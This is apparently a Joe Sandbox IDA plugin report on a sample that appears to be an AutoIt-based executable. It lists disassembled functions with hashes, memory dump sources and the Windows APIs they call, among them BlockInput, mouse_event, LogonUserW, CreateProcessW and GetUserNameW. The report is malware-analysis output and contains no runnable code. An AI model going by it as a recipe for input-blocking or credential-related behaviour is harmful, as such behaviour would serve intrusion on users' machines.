Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 6482c49ae4480dc00400eb5eae4e9e8c69abeaaf27f20b20380d3783dc53362b
Instruction ID: 658309cf89799b40247b1596dd17693c38bbf0edca5c178fcf5e478b75e61ab9
Opcode Fuzzy Hash: 6482c49ae4480dc00400eb5eae4e9e8c69abeaaf27f20b20380d3783dc53362b
Instruction Fuzzy Hash: 42012835600218AFDF249F69D889EF93BA1FF59367F084125FD169B192C330AC25D7A0

Function 0085C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
Part of subcall function 007D2344: ScreenToClient.USER32(008967B0,?), ref: 007D2374
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0080BC4F,?,?,?,?,?,00000001,?), ref: 0085C272

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 7ce0444d3b4b080890feddc7dbaebb616a09b3ffac0a5826dc8be42bc651e194
Instruction ID: fc3750c8bdaa1a6821e93491e1715b076d2b4056a1edb8189c51915eaa50501c
Opcode Fuzzy Hash: 7ce0444d3b4b080890feddc7dbaebb616a09b3ffac0a5826dc8be42bc651e194
Instruction Fuzzy Hash: 03F08234204228EFDF05AF49CC09EBA3BA1FB14752F004025F9569B292CB75A865DFE0

Function 007D189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,007D1B04,?,?,?,?,?), ref: 007D18E2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 94fc4c6e796fd25bfb7fa3615fead327f51ac18f2a75dad278dc1797ee108d42
Instruction ID: 88380be0f787cf91dfc79cdcb7841dce87d9cfd33e21365824b1fc36c71f3cb8
Opcode Fuzzy Hash: 94fc4c6e796fd25bfb7fa3615fead327f51ac18f2a75dad278dc1797ee108d42
Instruction Fuzzy Hash: 49F0BE30200214AFCB08EF54D86093637B2FB40360F54862AF9524B3A1EB35D860EB50

Function 008441FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00844218

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2e1c613653a3520d61ecdf7394725765881c742d6de4aa496ccae418f368e37a
Instruction ID: 918cfd2cd4d2b60b772e79e9b71b9af217c8f3a08fd02260916ab8b0d4c99542
Opcode Fuzzy Hash: 2e1c613653a3520d61ecdf7394725765881c742d6de4aa496ccae418f368e37a
Instruction Fuzzy Hash: 47E012312502189FC710AF59D444A9AB7E8EF94761F008016F94AD7352DAB4A8408BA0

Function 0085CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0085CBEE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: ed233daa5df334d19775477e3b1c7aff64f4930740ac315584bc5e9aaa2ca2b2
Instruction ID: 19897f310949a5da443de23dc7506aba4247dd14b08efb4fffd038af050fa0ad
Opcode Fuzzy Hash: ed233daa5df334d19775477e3b1c7aff64f4930740ac315584bc5e9aaa2ca2b2
Instruction Fuzzy Hash: 0DF06D31240354BFDB21EF58DC05FD63BA5FB09760F184059BA21672E2CB707824DBA1

Function 00834EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00834EEC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 4a38bf6f81e7e379cf35d6a375d672cd4dd2803eb69bb20fdbd6e655ec6522d3
Instruction ID: 0448b46e01ecbc6dcb1edc58abd6b3972ebdd6cc5b21a3a45deaaa427ddc532d
Opcode Fuzzy Hash: 4a38bf6f81e7e379cf35d6a375d672cd4dd2803eb69bb20fdbd6e655ec6522d3
Instruction Fuzzy Hash: B9D09E9916070979ED584B249C5FF771109F3817A6FD4754AB102C90C2E8D57C9590B1

Function 00828C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008288D1), ref: 00828CB3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
Instruction ID: 3dcfbe4cfcd81edcde4b846a815f2070857828a200d0d62e0f5263e10956677e
Opcode Fuzzy Hash: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
Instruction Fuzzy Hash: FAD05E32260A0EABEF018EA4DC01EAE3B69EB04B02F408111FE15C50A1C775D835AB60

Function 0085CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0080BC0C,?,?,?,?,?,?), ref: 0085CC24

Part of subcall function 0085B8EF: _memset.LIBCMT ref: 0085B8FE
Part of subcall function 0085B8EF: _memset.LIBCMT ref: 0085B90D
Part of subcall function 0085B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00897F20,00897F64), ref: 0085B93C
Part of subcall function 0085B8EF: CloseHandle.KERNEL32 ref: 0085B94E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 7e41cd95c8e677730df578820cc794fa2e9a945c4737c8ffa4d46f63f7945341
Instruction ID: 3446d2007abb04b32a97f878c6864129e799ec47a77cf67a133642ec20f9acd7
Opcode Fuzzy Hash: 7e41cd95c8e677730df578820cc794fa2e9a945c4737c8ffa4d46f63f7945341
Instruction Fuzzy Hash: ECE0B635210208DFCB01AF48DD45E9537A5FB1C396F014065FE159B2B2DB31AD64EF51

Function 007D167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,007D1AEE,?,?,?), ref: 007D16AB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e8ae3c419d661c42e08e177119b1beab45e23dbe5d8a51860ced157911275070
Instruction ID: 4c84e7637f34c57b208c83c7b3be95bf91e65c178f39f396cc33ffd4ffa215d6
Opcode Fuzzy Hash: e8ae3c419d661c42e08e177119b1beab45e23dbe5d8a51860ced157911275070
Instruction Fuzzy Hash: 8CE0EC35200208FBCF06AF90DC15E643B26FB58354F148429FA555A2A2DA36A522DB50

Function 0085CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0085CB75

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 4868b7d2f2150f285712b4a7107c8674984904398a4c0a1a772a8bf4142eb6bc
Instruction ID: d3e59769ba1cf30cad506cd3808ed30bd8ad31c2468011ffa48d9ac8cdb9ba6c
Opcode Fuzzy Hash: 4868b7d2f2150f285712b4a7107c8674984904398a4c0a1a772a8bf4142eb6bc
Instruction Fuzzy Hash: EBE0E235204208AFCB01EF88D884E863BA5BB1D300F014064FA1557262CB71A830EB61

Function 0085CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0085CBA4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 3b3d2414eb9e2bcc6bedb4208c1ce0a350ad1b104a2063a995540550df42023e
Instruction ID: 480b6eac219eb92b5c2b8c2059abaaa37c6772b604323dc34fc5c8f751d46285
Opcode Fuzzy Hash: 3b3d2414eb9e2bcc6bedb4208c1ce0a350ad1b104a2063a995540550df42023e
Instruction Fuzzy Hash: 46E0E235200208EFCB01EF88D844D863BA5BB1D300F014064FA1547262CB71A830EBA1

Function 007D16B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

Part of subcall function 007D201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007D20D3
Part of subcall function 007D201B: KillTimer.USER32(-00000001,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 007D216E

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,007D1AE2,?,?), ref: 007D16D4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 2c48f34bff65008b3e4011eb61e07a7516c3c3d2deed8c54a9c72fa36edfd4ee
Instruction ID: 1c09b4ec6c603f62f4d31bf7789c37de4f7d99388f1e7304457a8f1e89828948
Opcode Fuzzy Hash: 2c48f34bff65008b3e4011eb61e07a7516c3c3d2deed8c54a9c72fa36edfd4ee
Instruction Fuzzy Hash: 52D01230240308B7DE123FA1DC1BF593A29EB64750F508021BB04692D3DA75A822A568

Function 00812230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00812242

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c998fa57cc9f1213a278280f5f06cd8c9c0739762f399c4f90cd42a747b092af
Instruction ID: 9b5f12aa9303d3e6366a8e3ea03e3399c5e57fc82bc60ee394837cb54feaa247
Opcode Fuzzy Hash: c998fa57cc9f1213a278280f5f06cd8c9c0739762f399c4f90cd42a747b092af
Instruction Fuzzy Hash: 33C04CF180510DDBDB05DB90D988DEE77BCBB04315F144055A201F2141D7749B448A71

Function 007FA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 007FA36A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
Instruction ID: c0e7cc62d71eb6d461770b464d8e9543eee92babb0937b3015ac005303dd6027
Opcode Fuzzy Hash: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
Instruction Fuzzy Hash: 19A0113000020CAB8A002F82EC08888BFAEEA002A2B008020FA0C802328B32A8208A80

Function 007E8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfa50e64f4b64d32d224b93f8d948bc41cdf0a6b0cb53c453c79bc544b93b86
Instruction ID: 7cf8b0fe2951ab047055fce953ff785f50b84a7b5fae7fcfb3740bb186dc011a
Opcode Fuzzy Hash: 5bfa50e64f4b64d32d224b93f8d948bc41cdf0a6b0cb53c453c79bc544b93b86
Instruction Fuzzy Hash: 352249705026A5CBCF688B19D48467D77B1FB0A304F3584AAD84ADB2A1DB38DDC1CB72

Function 007F2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 46bcb3ba7d34cc867170d2eb515b74c288e7e86f20fadd8ca7bded97b730cb64
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 24C1C6322060974ADF2D463AD43403EFAE15EA27B135A0B5DE5B3CB6C5FF28D625D620

Function 007F283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 77538f077be4be7565b67c1ed2ec2f6151542100c6eed09a5b36c2ca0d291cc9
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 65C1E83220609749DF2D463AC43403EBBE15F927B135A0B5DE9B3DB2C5EF18D625D620

Function 00847B1B Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00847B70
DeleteObject.GDI32(00000000), ref: 00847B82
DestroyWindow.USER32 ref: 00847B90
GetDesktopWindow.USER32 ref: 00847BAA
GetWindowRect.USER32(00000000), ref: 00847BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00847CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00847D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847D4A
GetClientRect.USER32(00000000,?), ref: 00847D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00847D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DD0
GlobalFix.KERNEL32(00000000), ref: 00847DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847DE8
GlobalUnWire.KERNEL32(00000000), ref: 00847DF1
